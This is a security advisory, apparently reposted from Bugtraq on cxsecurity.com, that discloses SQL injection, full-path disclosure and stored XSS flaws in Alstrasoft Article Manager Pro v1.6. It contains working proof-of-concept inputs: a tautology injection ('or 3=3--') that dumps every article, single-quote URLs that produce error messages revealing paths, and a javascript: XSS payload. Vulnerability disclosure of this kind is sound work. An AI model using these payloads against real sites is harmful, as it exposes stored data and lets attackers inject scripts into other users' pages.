Bug: Alstrasoft Article Manager Pro v1.6 ( Ascii Version )

Search:
WLB2

Alstrasoft Article Manager Pro v1.6

Published
Credit
Risk
2006.05.25
luny youfucktard com
Medium
CWE
CVE
Local
Remote
N/A
CVE-2006-2567
CVE-2006-2566
CVE-2006-2565
No
Yes

Alstrasoft Article Manager Pro v1.6 - XSS & Full Path errors

Homepage:

http://www.alstrasoft.com

Description:

Article Manager Pro is the next generation article publishing system designed to make your life a whole lot easier by
enabling webmasters to publish articles or news into their website in a matter of minutes with our advance WYSIWYG
editor that includes features such as a built-in spell checker, word finder and many more.

Effected files:

profile.php

userarticles.php

submit_article.php

mraticles.php

admin.php

Exploits & Vulns:

SQL Injection query error

http://www.example.com/article/profile.php?author_id=1'

1064 : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for

the right syntax to use near ''' at line 1

SQL Injection:

http://www.example.com/article/userarticles.php?aut_id=3 or 3=3--

Proof Of Concept:

All articles in DB appear on page when the above query is preformed.

Full path errors

http://www.example.com/article/userarticles.php?aut_id=3'

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html

/article/functions.php on line 212

Invalid user id supplied!

http://www.example.com/article/mrarticles.php?action=read'

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html

/article/mrarticles.php on line 50

http://www.example.com/article/admin/admin.php?login

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html

/article/admin/auth.php on line 18

submit_article.php XSS Vuln.

When submitting an article using the submit_article.php file, input is not filtered. All the user has to do is enter

something like <DIV STYLE="background-image: url(javascript:alert('XSS'))">

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version